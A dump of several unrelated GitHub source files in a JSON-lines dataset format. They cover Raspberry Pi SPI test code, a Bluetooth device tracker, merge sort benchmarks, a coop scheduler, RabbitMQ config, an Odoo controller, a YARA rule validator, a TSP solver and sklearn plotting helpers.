\n'''\n# pinMode (ADC_CS, OUTPUT);\n# digitalWrite(ADC_CS, 0);\n# delay(100);\n# digitalWrite(ADC_CS, 1);\n\nCE_T = 20\n\nc = lgpio.gpiochip_open(0)\nlgpio.gpio_claim_output(c, CE_T, 1)\ntime.sleep(0.1)\n\n'''\nspi_r = spidev.SpiDev()\nspi_r.open(0, 1)\nspi_r.max_speed_hz = 1000000 #1MHz\nspi_r.mode = 0b01\nspi_r.lsbfirst = False\n'''\n\n#spi_r.cshigh = False\n#time.sleep(0.1)\n#spi_r.cshigh = True\n#time.sleep(0.1)\n\nL = 801\nH = 4030\n\ndef set_DAC(v):\n msb = (v >> 8) & 0x0F\n msb = msb | 0x30\n lsb = v & 0xFF\n\n lgpio.gpio_write(c, CE_T, 0)\n time.sleep(0.1)\n r = spi_t.xfer([msb, lsb])\n time.sleep(0.1)\n lgpio.gpio_write(c, CE_T, 1)\n print(\"set_DAC(\",v,\") returns:\", r)\n\ndef get_ADC():\n #msb = spi_r.xfer([0])\n #lsb = spi_r.xfer([0])\n msb = spi_r.readbytes(1)\n lsb = spi_r.readbytes(1)\n\n #result = ((msb & 0x1F) << 8) | lsb\n #return result >> 1\n return msb, lsb\n\n\ndef map420(v, flow, fhigh, tlow, thigh):\n if v < flow:\n return False, v\n if v > fhigh:\n return False, v\n \n return True, int((v - flow)*(thigh-tlow) / (fhigh-flow)+tlow)\n\n# https://www.theamplituhedron.com/articles/How-to-replicate-the-Arduino-map-function-in-Python-for-Raspberry-Pi/\n# Prominent Arduino map function :)\ndef _map(x, in_min, in_max, out_min, out_max):\n return int((x - in_min) * (out_max - out_min) / (in_max - in_min) + out_min)\n\t\n# TEST\ny = _map(25, 1, 50, 50, 1)\n#print(y)\n\nwhile True:\n n=int(input(\"Enter(0~4095):\"))\n set_DAC(n)\n time.sleep(0.25)\n #m,l=get_ADC()\n #print(\"msb:\",m, \" lsb:\",l)\n #time.sleep(0.25)\n","repo_name":"iryek-rpi/rpi-pump","sub_path":"Test/SPI/tclick.py","file_name":"tclick.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28449866990","text":"from typing import Union\n\nimport bluetooth\n\nfrom services.console_service import print_bluetooth\nfrom services.database_service import DatabaseService\n\n\nclass BluetoothService:\n \"\"\"This list contains all devices that are related to an account and nearby!\"\"\"\n devices_in_range: list[dict[str, str]] = []\n\n \"\"\"This list contains all devices that are not related to an account and nearby!\"\"\"\n devices_in_range_registrable: list[dict[str, str]] = []\n\n def __init__(self, service: DatabaseService) -> None:\n self.db_service: DatabaseService = service\n\n # https://github.com/pybluez/pybluez\n def scan(self, duration: int) -> None:\n print_bluetooth('Scanning for bluetooth devices...')\n # All devices that are nearby\n devices = bluetooth.discover_devices(duration=duration, lookup_names=True)\n\n # Remove device from \"devices_in_range\" if it was added before but now too far away\n for current in self.devices_in_range:\n if not any(device[0] == current.get('bd_addr') for device in devices):\n self._remove_device(current.get('name'), current.get('bd_addr'))\n\n # Remove device from \"devices_in_range_registrable\" if it was added before but now too far away\n for current in self.devices_in_range_registrable:\n if not any(device[0] == current.get('bd_addr') for device in devices):\n self.devices_in_range_registrable.remove(BluetoothService._convert_to_dict(current.get('name'),\n current.get('bd_addr')))\n # If no devices are nearby; nothing to add\n if len(devices) == 0:\n print_bluetooth('No new device found!')\n return\n\n # Check whether new devices are nearby\n for addr, name in devices:\n if BluetoothService._convert_to_dict(name, addr) not in self.devices_in_range:\n 
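# device just came into range; _add_device routes it to the registered\n # or registrable list depending on whether its address is in the database\n 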
self._add_device(name, addr)\n\n def register(self, device_name: str, bd_addr: str) -> None:\n self.devices_in_range_registrable.remove(self._convert_to_dict(device_name, bd_addr))\n self.devices_in_range.append(self._convert_to_dict(device_name, bd_addr))\n\n def update(self, old_device_entry: dict[str, str], new_device_name: str, new_bd_addr: str) -> None:\n self.register(new_device_name, new_bd_addr)\n self.delete(old_device_entry)\n\n def delete(self, device_entry: dict[str, str]) -> None:\n self.devices_in_range.remove(device_entry)\n self.devices_in_range_registrable.append(device_entry)\n\n def get_bluetooth_device_entry(self, user_id: int) -> Union[dict[str, str], bool]:\n user = self.db_service.get_user(user_id)\n user_bd_name = None\n\n for device in self.devices_in_range.copy():\n if device.get('bd_addr') == user.get('bd_addr'):\n user_bd_name = device.get('name')\n\n if user_bd_name is None:\n return False\n\n return self._convert_to_dict(user_bd_name, user.get('bd_addr'))\n\n def _add_device(self, name: str, bd_address: str) -> None:\n entry: dict = BluetoothService._convert_to_dict(name, bd_address)\n print_bluetooth('Found new device \\\"%s\\\"!' % name)\n\n if not self.db_service.bd_addr_exists(bd_address):\n if entry not in self.devices_in_range_registrable:\n self.devices_in_range_registrable.append(entry)\n print_bluetooth('\\tDevice not registered!')\n return\n\n self.devices_in_range.append(entry)\n print_bluetooth('\\tAdded new device: ')\n print_bluetooth('\\tName: %s' % name)\n print_bluetooth('\\tBD address: %s' % bd_address)\n\n def _remove_device(self, name: str, bd_address: str) -> None:\n print_bluetooth('Found old device!')\n self.devices_in_range.remove(BluetoothService._convert_to_dict(name, bd_address))\n print_bluetooth('\\tRemoved device: ')\n print_bluetooth('\\tName: %s' % name)\n print_bluetooth('\\tBD address: %s' % bd_address)\n\n @staticmethod\n def _convert_to_dict(name: str, bd_address: str) -> dict[str, str]:\n return dict({'name': name, 'bd_addr': bd_address})\n","repo_name":"TorbenWest/PIOT","sub_path":"src/services/bluetooth_service.py","file_name":"bluetooth_service.py","file_ext":"py","file_size_in_byte":4209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39030758724","text":"import random\nimport timeit\n\n\ndef merge_sort1(input_list):\n return_list = []\n if len(input_list) >= 2:\n mid_list = len(input_list) // 2\n list1 = merge_sort1(input_list[:mid_list])\n list2 = merge_sort1(input_list[mid_list:])\n while list1 or list2:\n if not list1:\n return_list.append(list2.pop(0))\n elif not list2:\n return_list.append(list1.pop(0))\n elif list1[0] < list2[0]:\n return_list.append(list1.pop(0))\n else:\n return_list.append(list2.pop(0))\n else:\n return_list = input_list\n return return_list\n\n\ndef merge_sort2(input_list):\n return_list = []\n if len(input_list) >= 2:\n mid_list = len(input_list) // 2\n list1 = merge_sort2(input_list[:mid_list])\n list2 = merge_sort2(input_list[mid_list:])\n while list1 and list2:\n if list1[0] < list2[0]:\n return_list.append(list1.pop(0))\n else:\n return_list.append(list2.pop(0))\n return_list.extend(list1)\n return_list.extend(list2)\n else:\n return_list = input_list\n return return_list\n\n\nint_list = [random.randint(0, 100000) for _ in range(100000)]\n\n# print(timeit.timeit(lambda: bubble_sort(input_list), number=10))\nprint(timeit.timeit(lambda: merge_sort1(int_list), number=100))\nprint(timeit.timeit(lambda: merge_sort2(int_list), 
number=100))\n","repo_name":"erkiraak/SDA-class-work","sub_path":"4_Python_algorithms_and_data_structures/sort_merge.py","file_name":"sort_merge.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"73558585530","text":"# Main cron for running equipment on a schedule. Checks each piece of equipment in the coop\n# and decides if its time to turn it on or off.\n#\n# Check available options:\n# python scheduler.py -h\n#\n# Crontab: every 10 minutes during the daytime\n# 0/10 5-20 * * * python /full/path/scheduler.py -s /some/path/data/settings.json\n#\n#\n\nimport logging\nimport argparse\nfrom datetime import datetime\nfrom dateutil import tz\nfrom coopcontrol import door,light\n\nsysparse = argparse.ArgumentParser(description=\"Check each piece of equipment in the coop \"\n \"and decide if it should be on or off.\")\nsysparse.add_argument('-s', '--settings', required=True,\n help=(\"The location of the settings.json file containing information like \"\n \"the BCM pins for your coop. Ex: \"\n \"/tmp/files/settings.json\"))\nsysargs = sysparse.parse_args()\n\n\ndef check_item(item):\n current_time = datetime.now(tz.tzlocal())\n\n start = item.get_start_time()\n end = item.get_end_time()\n\n if start <= current_time < end:\n logging.debug('within the start and end time, %s should be %s',\n item.__class__.__name__,\n item.get_status_name(1))\n item.set_status(1)\n else:\n logging.debug('outside the start and end time, %s should be %s',\n item.__class__.__name__,\n item.get_status_name(0))\n item.set_status(0)\n\n\ndef main():\n check_item(light.Light(sysargs.settings))\n check_item(door.Door(sysargs.settings))\n\n\nif __name__ == '__main__':\n main()","repo_name":"isometimescode/coopcontrol","sub_path":"bin/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"77"} +{"seq_id":"27316825606","text":"class work:\n\n @staticmethod\n def startend(array1):\n a = []\n start = array1[0]\n end = array1[len(array1)-1]\n\n a.append(start)\n a.append(end)\n\n print(a)\n\naayush = work()\nb = [-1,-34,5, 10, 15, 20, 25,30,27,34]\n\naayush.startend(b)\n","repo_name":"a332shar/Python-Projects","sub_path":"start and end of a list.py","file_name":"start and end of a list.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13025780900","text":"import copy\nimport dataclasses\nfrom typing import Generator, Optional\n\n\n@dataclasses.dataclass\nclass RMQSSLOptions:\n \"\"\"\n cafile: str\n keyfile: str\n certfile: str\n verify: int\n\n verify param: 1 or 0 - to verify certificate or not\n \"\"\"\n\n cafile: str\n keyfile: str\n certfile: str\n verify: int\n\n\n@dataclasses.dataclass\nclass RabbitMQConfig:\n \"\"\"\n login: str\n password: str\n virtualhost: str\n host: Optional[str] = None\n port: Optional[int] = None\n addresses: Optional[str] = None\n ssl_options: Optional[RMQSSLOptions] = None\n\n Note: address, host & port are 'Optional', but at least one of: address, or host + port\n must be set to connect with Rabbit MQ !\n \"\"\"\n\n login: str\n password: str\n virtualhost: str\n host: Optional[str] = None\n port: Optional[int] = None\n addresses: Optional[str] = None\n ssl_options: Optional[RMQSSLOptions] = None\n\n def __post_init__(self):\n if self.port:\n try:\n self.port = 
int(self.port)\n except ValueError:\n raise ValueError(\"Port must be a number!\")\n\n def generate(self) -> Generator[\"RabbitMQConfig\", None, None]:\n if self.host and self.port:\n yield self\n\n if self.addresses:\n for address in self.addresses.split(\",\"):\n rmq_config = copy.copy(self)\n rmq_config.host, rmq_config.port = address.split(\":\")\n rmq_config.port = int(rmq_config.port)\n yield rmq_config\n\n def all_required(self) -> bool:\n \"\"\"This method verifies existence all fields required to connect to RabbitMQ.\n 'addresses' is not checked, since it should be parsed i.e. using .generate() method\n \"\"\"\n\n return all(\n (\n elem is not None\n for elem in (self.login, self.password, self.virtualhost, self.host, self.port)\n )\n )\n","repo_name":"ngraczykowski/iris-root","sub_path":"modules/s8-python-network/s8_python_network/pika_connection/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43690320301","text":"from zope.interface import implements\nfrom zope.component import getAdapters, queryMultiAdapter\nfrom Products.CMFCore.utils import getToolByName\nfrom plone.app.portlets.portlets import base\nfrom plone.portlets.interfaces import IPortletDataProvider\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\nfrom zope.viewlet.interfaces import IViewletManager, IViewlet\nfrom zope.contentprovider.tales import addTALNamespaceData\nfrom simplelayout.portlet.dropzone.interfaces import (\n ISimpleLayoutListingPortletViewlet, ISlotBlock)\n\n\nclass ISimplelayoutDropZonePortlet(IPortletDataProvider):\n \"\"\"\n marker Interface for portlet\n \"\"\"\n\n\nclass Assignment(base.Assignment):\n \"\"\"Portlet assignment.\n \"\"\"\n implements(ISimplelayoutDropZonePortlet)\n @property\n def title(self):\n return \"Simplelayout DropZone Portlet\"\n\n\nclass Renderer(base.Renderer):\n \"\"\"Portlet renderer\n \"\"\"\n\n render = ViewPageTemplateFile('drop_zone_portlet.pt')\n\n\n def update(self):\n context = self.context\n\n\n def blockRenderer(self,name=\"simplelayout.portlet.listing\"):\n\n manager = queryMultiAdapter((self.context, self.request, self),\n IViewletManager, name)\n viewlet_adapters = getAdapters(\n (manager.context, manager.request, manager.__parent__, manager),\n IViewlet)\n\n if manager is None:\n return ''\n addTALNamespaceData(manager, self.context)\n manager.update()\n return manager.render()\n\n def getBlockPortlets(self):\n return self.context.getFolderContents(\n {'object_provides':[ISlotBlock.__identifier__]})\n\n @property\n def available(self):\n mtool = getToolByName(self.context,'portal_membership')\n if self.getBlockPortlets():\n return True\n if mtool.checkPermission('Modify portal content', self.context):\n return True\n return False\n\n\nclass AddForm(base.NullAddForm):\n def create(self):\n return Assignment()\n","repo_name":"4teamwork/simplelayout.portlet.dropzone","sub_path":"simplelayout/portlet/dropzone/portlets/drop_zone_portlet.py","file_name":"drop_zone_portlet.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74220451127","text":"import urllib\nimport urlparse\nfrom collections import defaultdict\n\nfrom django.core.cache import cache\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom django.template import RequestContext\nfrom 
django.shortcuts import render_to_response, get_object_or_404\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponseRedirect, Http404\nfrom django.template.defaultfilters import slugify\n\nfrom gitawesome.models import Project, Profile, Commit\nfrom gitawesome.forms import RepoForm\nfrom gitawesome.tasks import analyze_repo\n\nfrom gitawesome.utils import get_github_repo_url\n\n\ndef home(request):\n context = {\n }\n return render_to_response('gitawesome/home.html', context,\n context_instance=RequestContext(request))\n\ndef repo(request):\n repo_form = RepoForm()\n if request.method == 'POST':\n repo_form = RepoForm(request.POST)\n if repo_form.is_valid():\n # queue repo analysis\n url = repo_form.cleaned_data['repo_url']\n parts = urlparse.urlsplit(url)\n username, project_name = filter(None, parts[2].split('/'))\n User.objects.get_or_create(username=username)\n Project.objects.get_or_create(name=project_name,\n url=get_github_repo_url(username, project_name))\n analyze_repo.delay(username, project_name)\n return HttpResponseRedirect('%s?%s' % (\n reverse('gitawesome_repo_queued'), urllib.urlencode({\n 'username': username,\n 'project_name': project_name,\n })))\n context = {\n 'repo_form': repo_form,\n }\n return render_to_response('gitawesome/repo.html', context,\n context_instance=RequestContext(request))\n\ndef repo_queued(request):\n username = request.GET.get('username')\n project_name = request.GET.get('project_name')\n context = {\n 'username': username,\n 'project_name': project_name,\n }\n return render_to_response('gitawesome/repo_queued.html', context,\n context_instance=RequestContext(request))\n\ndef user(request, username):\n profile = get_object_or_404(Profile, slug=slugify(username))\n if (request.user.is_authenticated() and\n profile.user.username == request.user.username):\n # show dashboard\n #return HttpResponseRedirect(reverse('gitawesome_dashboard',\n #args=(request.user.username,)))\n pass\n commits_by_project = defaultdict(list)\n for c in Commit.objects.filter(\n user=profile.user).order_by('project__id'):\n commits_by_project[c.project].append(c)\n context = {\n 'profile': profile,\n 'commits_by_project': commits_by_project.iteritems(),\n }\n return render_to_response('gitawesome/user.html', context,\n context_instance=RequestContext(request))\n\ndef project(request, username, project_name):\n key = 'project-%s-%s' % (username, project_name)\n context = cache.get(key)\n if context is None:\n profile = get_object_or_404(Profile, slug=slugify(username))\n try:\n project = Project.objects.get(url=get_github_repo_url(username, project_name))\n except Project.DoesNotExist:\n raise Http404\n commits_by_user = defaultdict(list)\n for c in project.commit_set.all():\n commits_by_user[c.user].append(c)\n commits = sorted([(sum(c.points for c in commits), user)\n for user,commits in commits_by_user.iteritems()], reverse=True)\n context = {\n 'profile': profile,\n 'project': project,\n 'commits': commits,\n }\n cache.set(key, context, 3600)\n return render_to_response('gitawesome/project.html', context,\n context_instance=RequestContext(request))\n\n","repo_name":"macro/dash11","sub_path":"dash_proj/gitawesome/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3872,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"37772670044","text":"# -- coding:utf-8 --\n\nfrom utils_features_selection import *\n\n\ndef create_table(cols=['乳酸脱氢酶', '淋巴细胞(%)', '超敏C反应蛋白']):\n 
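# default cols translate to: lactate dehydrogenase, lymphocyte (%), high-sensitivity C-reactive protein\n    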
data_df_unna, data_pre_df = data_preprocess()\n data_df_unna = data_df_unna.dropna(subset=cols, how='any')\n\n cols.append('Type2')\n Tets_Y = data_pre_df.reset_index()[['PATIENT_ID', '出院方式']].copy()\n Tets_Y = Tets_Y.rename(columns={'PATIENT_ID': 'ID', '出院方式': 'Y'})\n y_true = Tets_Y['Y'].values\n\n x_col = cols[:-1]\n y_col = cols[-1]\n x_np = data_df_unna[x_col].values\n y_np = data_df_unna[y_col].values\n x_test = data_pre_df[x_col].values\n X_train, X_val, y_train, y_val = train_test_split(x_np, y_np, test_size=0.3, random_state=6)\n model = xgb.XGBClassifier(\n max_depth=3,\n n_estimators=1,\n )\n model.fit(X_train, y_train)\n\n pred_test = model.predict(x_test)\n\n print(classification_report(y_true, pred_test))\n\nif __name__ == '__main__':\n create_table()\n","repo_name":"MI2-Education/2021L-WB-ML","sub_path":"DeepJajo/raport_v1/table4.py","file_name":"table4.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"42460298966","text":"#!/usr/bin/env python\n\"\"\"\nvalidate_yara.py\n\nCommand line utility to validate a directory of YARA rules files.\n\"\"\"\nimport argparse\nimport glob\nimport sys\n\nimport yara\n\n\ndef main():\n parser = argparse.ArgumentParser(prog=\"validate_yara.py\",\n description=\"validates YARA rules files.\",\n usage=\"%(prog)s [options]\")\n parser.add_argument(\"-p\", \"--path\",\n dest=\"path\",\n help=\"path to directory containing YARA rules\")\n parser.add_argument(\"-e\", \"--error\",\n action=\"store_true\",\n default=False,\n dest=\"error\",\n help=\"boolean that determines if warnings should\"\n \" cause errors\")\n args = parser.parse_args()\n\n path = args.path or None\n error = args.error\n if path is None:\n sys.exit(\"Please provide a path.\")\n\n globbed_paths = glob.iglob(f\"{path}/**/*.yar*\", recursive=True)\n for (idx, entry) in enumerate(globbed_paths):\n try:\n if error:\n yara.compile(filepath=entry, error_on_warning=True)\n else:\n yara.compile(filepath=entry)\n except (yara.Error, yara.SyntaxError) as YaraError:\n print(YaraError)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"seclab-int-dev-group/strelka","sub_path":"validate_yara.py","file_name":"validate_yara.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"32919853513","text":"from typing import (\n List,\n)\n\nclass Solution:\n \"\"\"\n @param n: an integer,denote the number of cities\n @param roads: a list of three-tuples,denote the road between cities\n @return: return the minimum cost to travel all cities\n \"\"\"\n def __init__(self):\n self.minCost = float(\"inf\") \n\n def min_cost(self, n: int, roads: List[List[int]]) -> int:\n graph = self.find_neighbors(n, roads)\n self.dfs(n, roads, graph, [1], {1}, 1, 0)\n return self.minCost\n \n def dfs(self, num_city, roads, graph, path, visited, city, cost):\n if len(visited) == num_city:\n self.minCost = min(self.minCost, cost)\n \n for next_city in graph[city]:\n if next_city in visited:\n continue \n if self.not_good_path(path, next_city, graph):\n continue \n visited.add(next_city) \n path.append(next_city)\n self.dfs(num_city, roads, graph, path, visited, next_city, cost + graph[city][next_city])\n visited.remove(next_city)\n path.pop()\n \n def not_good_path(self, path, new_city, graph):\n # |\n # [1, 2, 3, 4, 5] -> city\n for i in range(1, len(path)):\n # using the above example, supposely i is 1\n # check if w(1 
-> 2) + w(5 -> city) > w(1 -> 5) + w(3 -> city)\n # keep on checking as i increment, looking for cheaper way than adding city directly to the end of path, which is the left side logic. \n if graph[path[i - 1]][path[i]] + graph[path[-1]][new_city] > graph[path[i - 1]][path[-1]] + graph[path[i]][new_city]:\n return True \n return False\n\n def find_neighbors(self, num_city, roads):\n graph = {i: {j: float(\"inf\") for j in range(1, num_city + 1)} for i in range(1, num_city + 1)} \n\n for city1, city2, cost in roads:\n graph[city1][city2] = min(graph[city1][city2], cost)\n graph[city2][city1] = min(graph[city2][city1], cost)\n \n return graph\n\n","repo_name":"sherry-debug715/Algorithms-notes","sub_path":"Traveling Salesman Problem/2prunning.py","file_name":"2prunning.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33632716961","text":"# -*- coding: utf-8 -*-\nfrom odoo import http\nfrom odoo.http import request\n\nclass VitPortocv(http.Controller):\n\n\t# Public\n\t@http.route(\"/index/\", auth='public')\n\tdef index(self, employee_id, **kw): # hasil parsing di masukan ke fungsi\n\t\temployee_id = request.env['hr.employee'].sudo().search([('id', '=', employee_id) ]) # employee_id dari parameter\n\t\t\n\t\tif employee_id:\n\t\t\treturn request.render(\"vit_portocv.index\", {\n\t\t\t\t'employee_id'\t: employee_id,\n\t\t\t})\n\t\telse:\n\t\t\treturn request.render(\"vit_portocv.not_found\", {\n\t\t\t})\n\n# class VitPortocv(http.Controller):\n\n # @http.route('/index/', auth='public')\n # def list(self, **kw):\n # return http.request.render('vit_portocv.index', {\n # })\n\n# @http.route('/vit_portocv/vit_portocv/objects//', auth='public')\n# def object(self, obj, **kw):\n# return http.request.render('vit_portocv.object', {\n# 'object': obj\n# })","repo_name":"rahmansaleh7/vit_portocv","sub_path":"controllers/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13723225337","text":"prompt = \"Please enter an IP address. An IP address consists of 4 numbers,\" \\\n \"separated from each other with a full stop: \"\n\nipAddress = input(prompt)\n\nsegment = 1\nsegment_length = 0\n\nif ipAddress[-1] != '.':\n ipAddress += '.'\n\nif ipAddress != '':\n for character in ipAddress:\n if character == '.':\n print(\"Segment {} contains {} characters\".format(segment, segment_length))\n segment += 1\n segment_length = 0\n else:\n segment_length += 1\n\n # Unless the final character in the string was a . 
then we haven't printed the last_segment\n if character != '.':\n print(\"Segment {} contains {} characters\".format(segment, segment_length))\nelse:\n print('Please enter a valid ipAddress')\n","repo_name":"joshuagato/learning-python","sub_path":"FlowControl/Challenge.py","file_name":"Challenge.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42786348489","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import GridSearchCV\n\n#evaluamos el modelo usando mape\ndef mean_absolute_percentage_error(y_true, y_pred):\n with np.errstate(divide='ignore',invalid='ignore'):\n y_true, y_pred = np.array(y_true), np.array(y_pred)\n return np.mean(np.abs((y_true - y_pred) / y_true)) * 100\n\ndef plot_grid_search(cv_results, grid_param_1, grid_param_2, name_param_1, name_param_2):\n \"\"\"\n\n From: https://stackoverflow.com/questions/37161563/how-to-graph-grid-scores-from-gridsearchcv\n \"\"\"\n # Get Test Scores Mean and std for each grid search\n scores_mean = cv_results['mean_test_score']\n scores_mean = np.array(scores_mean).reshape(len(grid_param_2),len(grid_param_1))\n\n scores_sd = cv_results['std_test_score']\n scores_sd = np.array(scores_sd).reshape(len(grid_param_2),len(grid_param_1))\n\n # Plot Grid search scores\n _, ax = plt.subplots(1,1)\n\n # Param1 is the X-axis, Param 2 is represented as a different curve (color line)\n for idx, val in enumerate(grid_param_2):\n ax.plot(grid_param_1, scores_mean[idx,:], '-o', label= name_param_2 + ': ' + str(val))\n\n ax.set_title(\"Grid Search Scores\", fontsize=20, fontweight='bold')\n ax.set_xlabel(name_param_1, fontsize=16)\n ax.set_ylabel('CV Average Score', fontsize=16)\n ax.legend(loc=\"best\", fontsize=15)\n ax.grid('on')\n\n\n\ndef plot_grid_search_validation_curve(grid, param_to_vary,\n title='Validation Curve', ylim=None,\n xlim=None, log=None):\n\n \"\"\"\n From: https://matthewbilyeu.com/blog/2019-02-05/validation-curve-plot-from-gridsearchcv-results\n Plots train and cross-validation scores from a GridSearchCV instance's\n best params while varying one of those params.\"\"\"\n\n df_cv_results = pd.DataFrame(grid.cv_results_)\n train_scores_mean = df_cv_results['mean_train_score']\n valid_scores_mean = df_cv_results['mean_test_score']\n train_scores_std = df_cv_results['std_train_score']\n valid_scores_std = df_cv_results['std_test_score']\n\n param_cols = [c for c in df_cv_results.columns if c[:6] == 'param_']\n param_ranges = [grid.param_grid[p[6:]] for p in param_cols]\n param_ranges_lengths = [len(pr) for pr in param_ranges]\n\n train_scores_mean = np.array(train_scores_mean).reshape(*param_ranges_lengths)\n valid_scores_mean = np.array(valid_scores_mean).reshape(*param_ranges_lengths)\n train_scores_std = np.array(train_scores_std).reshape(*param_ranges_lengths)\n valid_scores_std = np.array(valid_scores_std).reshape(*param_ranges_lengths)\n\n param_to_vary_idx = param_cols.index('param_{}'.format(param_to_vary))\n\n slices = []\n for idx, param in enumerate(grid.best_params_):\n if (idx == param_to_vary_idx):\n slices.append(slice(None))\n continue\n best_param_val = grid.best_params_[param]\n idx_of_best_param = 0\n if isinstance(param_ranges[idx], np.ndarray):\n idx_of_best_param = param_ranges[idx].tolist().index(best_param_val)\n else:\n idx_of_best_param = param_ranges[idx].index(best_param_val)\n slices.append(idx_of_best_param)\n\n train_scores_mean = 
train_scores_mean[tuple(slices)]\n valid_scores_mean = valid_scores_mean[tuple(slices)]\n train_scores_std = train_scores_std[tuple(slices)]\n valid_scores_std = valid_scores_std[tuple(slices)]\n\n plt.clf()\n\n plt.title(title)\n plt.xlabel(param_to_vary)\n plt.ylabel('Score')\n\n if (ylim is None):\n plt.ylim(0.0, 1.1)\n else:\n plt.ylim(*ylim)\n\n if (not (xlim is None)):\n plt.xlim(*xlim)\n\n lw = 2\n\n plot_fn = plt.plot\n if log:\n plot_fn = plt.semilogx\n\n param_range = param_ranges[param_to_vary_idx]\n if (not isinstance(param_range[0], numbers.Number)):\n param_range = [str(x) for x in param_range]\n plot_fn(param_range, train_scores_mean, label='Training score', color='r',\n lw=lw)\n plt.fill_between(param_range, train_scores_mean - train_scores_std,\n train_scores_mean + train_scores_std, alpha=0.1,\n color='r', lw=lw)\n plot_fn(param_range, valid_scores_mean, label='Cross-validation score',\n color='b', lw=lw)\n plt.fill_between(param_range, valid_scores_mean - valid_scores_std,\n valid_scores_mean + valid_scores_std, alpha=0.1,\n color='b', lw=lw)\n\n plt.legend(loc='lower right')\n\n plt.show()\n\n\ndef plot_validation_curve(degree,train_score,val_score):\n plt.plot(degree, np.median(train_score, 1), color='blue', label='training score')\n plt.plot(degree, np.median(val_score, 1), color='red', label='validation score')\n plt.legend(loc='best')\n plt.xlabel(\"degree\")\n plt.ylabel(\"score\")\n plt.show()\n\n\ndef plot_learning_curve(estimator, title, X, y, ylim=None, cv=None,\n n_jobs=None, train_sizes=np.linspace(.1, 1.0, 5)):\n \"\"\"\n Generate a simple plot of the test and training learning curve.\n\n Parameters\n ----------\n estimator : object type that implements the \"fit\" and \"predict\" methods\n An object of that type which is cloned for each validation.\n\n title : string\n Title for the chart.\n\n X : array-like, shape (n_samples, n_features)\n Training vector, where n_samples is the number of samples and\n n_features is the number of features.\n\n y : array-like, shape (n_samples) or (n_samples, n_features), optional\n Target relative to X for classification or regression;\n None for unsupervised learning.\n\n ylim : tuple, shape (ymin, ymax), optional\n Defines minimum and maximum yvalues plotted.\n\n cv : int, cross-validation generator or an iterable, optional\n Determines the cross-validation splitting strategy.\n Possible inputs for cv are:\n - None, to use the default 3-fold cross-validation,\n - integer, to specify the number of folds.\n - :term:`CV splitter`,\n - An iterable yielding (train, test) splits as arrays of indices.\n\n For integer/None inputs, if ``y`` is binary or multiclass,\n :class:`StratifiedKFold` used. If the estimator is not a classifier\n or if ``y`` is neither binary nor multiclass, :class:`KFold` is used.\n\n Refer :ref:`User Guide ` for the various\n cross-validators that can be used here.\n\n n_jobs : int or None, optional (default=None)\n Number of jobs to run in parallel.\n ``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.\n ``-1`` means using all processors. See :term:`Glossary `\n for more details.\n\n train_sizes : array-like, shape (n_ticks,), dtype float or int\n Relative or absolute numbers of training examples that will be used to\n generate the learning curve. If the dtype is float, it is regarded as a\n fraction of the maximum size of the training set (that is determined\n by the selected validation method), i.e. 
it has to be within (0, 1].\n Otherwise it is interpreted as absolute sizes of the training sets.\n Note that for classification the number of samples usually have to\n be big enough to contain at least one sample from each class.\n (default: np.linspace(0.1, 1.0, 5))\n \"\"\"\n plt.figure()\n plt.title(title)\n if ylim is not None:\n plt.ylim(*ylim)\n plt.xlabel(\"Training examples\")\n plt.ylabel(\"Score\")\n train_sizes, train_scores, test_scores = learning_curve(\n estimator, X, y, cv=cv, n_jobs=n_jobs, train_sizes=train_sizes)\n train_scores_mean = np.mean(train_scores, axis=1)\n train_scores_std = np.std(train_scores, axis=1)\n test_scores_mean = np.mean(test_scores, axis=1)\n test_scores_std = np.std(test_scores, axis=1)\n plt.grid()\n\n plt.fill_between(train_sizes, train_scores_mean - train_scores_std,\n train_scores_mean + train_scores_std, alpha=0.1,\n color=\"r\")\n plt.fill_between(train_sizes, test_scores_mean - test_scores_std,\n test_scores_mean + test_scores_std, alpha=0.1, color=\"g\")\n plt.plot(train_sizes, train_scores_mean, 'o-', color=\"r\",\n label=\"Training score\")\n plt.plot(train_sizes, test_scores_mean, 'o-', color=\"g\",\n label=\"Cross-validation score\")\n\n plt.legend(loc=\"best\")\n return 